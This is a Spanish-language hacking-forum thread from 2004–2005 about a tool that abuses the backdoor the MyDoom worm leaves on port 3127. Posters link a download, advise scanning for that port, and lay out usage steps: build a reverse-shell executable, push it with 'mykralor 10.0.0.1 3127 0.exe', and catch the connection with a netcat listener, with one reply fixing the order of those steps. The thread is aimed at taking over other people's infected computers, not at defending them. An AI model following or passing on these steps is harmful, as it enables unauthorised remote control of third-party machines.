elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 19:46  


Tema destacado: Recuperar cuenta de Google, GMail, Youtube

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  MyDoom 1.0 Exploit (mykrawler)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: MyDoom 1.0 Exploit (mykrawler)  (Leído 1,915 veces)
loco5

Desconectado Desconectado

Mensajes: 217


¡Amo YaBB SE!


Ver Perfil WWW
MyDoom 1.0 Exploit (mykrawler)
« en: 10 Febrero 2004, 18:06 »

http://www.coromputer.net/dl.crpt?id=22

como estaba esperando ya esta el exploit ya compilando para poder aprovechar del virus mydoom
este programa te permite conectarte al ordinador infectado y subirle un fichero y ejecutarlo.
hay un pequeño problema q consiste en q el progra a subir no tiene q tener mas d 1.5 kb pero en sitio d autor hay un prog q te devuelve un shell q esta disponible tambien ocupa 1.5 kb
« Última modificación: 1 Enero 2006, 02:05 por Sirdarckcat » En línea
vicecity


Desconectado Desconectado

Mensajes: 894



Ver Perfil
Re:[mykralor-v1.0]
« Respuesta #1 en: 23 Febrero 2004, 02:14 »

Creo que hace falta un scanner para buscar ips infectadas con mydoom.

 adios.
« Última modificación: 1 Enero 2006, 02:02 por Sirdarckcat » En línea
loco5

Desconectado Desconectado

Mensajes: 217


¡Amo YaBB SE!


Ver Perfil WWW
Re:[mykralor-v1.0]
« Respuesta #2 en: 23 Febrero 2004, 14:36 »

puedes escanear por el puerto 3127 ya q el virus abre este puerto
En línea
fjosito

Desconectado Desconectado

Mensajes: 16


¡Amo YaBB SE!


Ver Perfil
Re:[mykralor-v1.0]
« Respuesta #3 en: 25 Febrero 2004, 17:03 »

Como se utiliza el rsCRT-v1.0 para poder utilizar el bug del nydoom...
En línea
fjosito

Desconectado Desconectado

Mensajes: 16


¡Amo YaBB SE!


Ver Perfil
Re:[mykralor-v1.0]
« Respuesta #4 en: 3 Marzo 2004, 00:33 »

Estos son los pasos que sigo:

1.º Busco una IP vulnerable al mydoom.
     Ejemplo : 10.0.0.1

2.º Creo con el rsCRT.exe un programa de shell inverso.
     Ejemplo : My IP + Puerto

3.º Mando con el  programa mykalor my shell inversa (0.exe).
     Ejemplo : mykralor 10.0.0.1 3127 0.exe

3.º Dejo el netcat a la escucha.
     Ejemplo : nc My IP + puerto de la sell

Imagino que hasta aqui los paso son correctos, pero al recibir la conexion del del connect to [my ip] from 10.0.0.1 y un puerto 1500 send 0, revd 0, me devuelve el control a mi interprete de comandos, que es lo que hago mal.

Saludos.
En línea
Gospel
Colaborador
***
Desconectado Desconectado

Mensajes: 1.587


Ver Perfil WWW
Re:[mykralor-v1.0]
« Respuesta #5 en: 3 Marzo 2004, 15:28 »

La verdad no he leído mucho sobre esto, pero algo es seguro, antes de ejecutar un "reverse shell" debes tener el nc a la escucha en el puerto.

Así q supongo q:
3.º Dejo el netcat a la escucha.
    Ejemplo : nc My IP + puerto de la sell
4.º Mando con el  programa mykalor my shell inversa (0.exe).
    Ejemplo : mykralor 10.0.0.1 3127 0.exe

De todas formas, en este hilo creo q hablan un poco del rsCRT....

http://www.governmentsecurity.org/forum/index.php?showtopic=6474&st=0

Suerte
En línea

danips

Desconectado Desconectado

Mensajes: 23

Esta imagen oculta algo misterioso...


Ver Perfil
Re:[mykralor-v1.0]
« Respuesta #6 en: 31 Diciembre 2005, 12:35 »

La verdad no he leído mucho sobre esto, pero algo es seguro, antes de ejecutar un "reverse shell" debes tener el nc a la escucha en el puerto.

Así q supongo q:
3.º Dejo el netcat a la escucha.
    Ejemplo : nc My IP + puerto de la sell
4.º Mando con el  programa mykalor my shell inversa (0.exe).
    Ejemplo : mykralor 10.0.0.1 3127 0.exe

De todas formas, en este hilo creo q hablan un poco del rsCRT....

http://www.governmentsecurity.org/forum/index.php?showtopic=6474&st=0

Suerte

ya no esta la pagina oficial de donde me lo descargo?
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines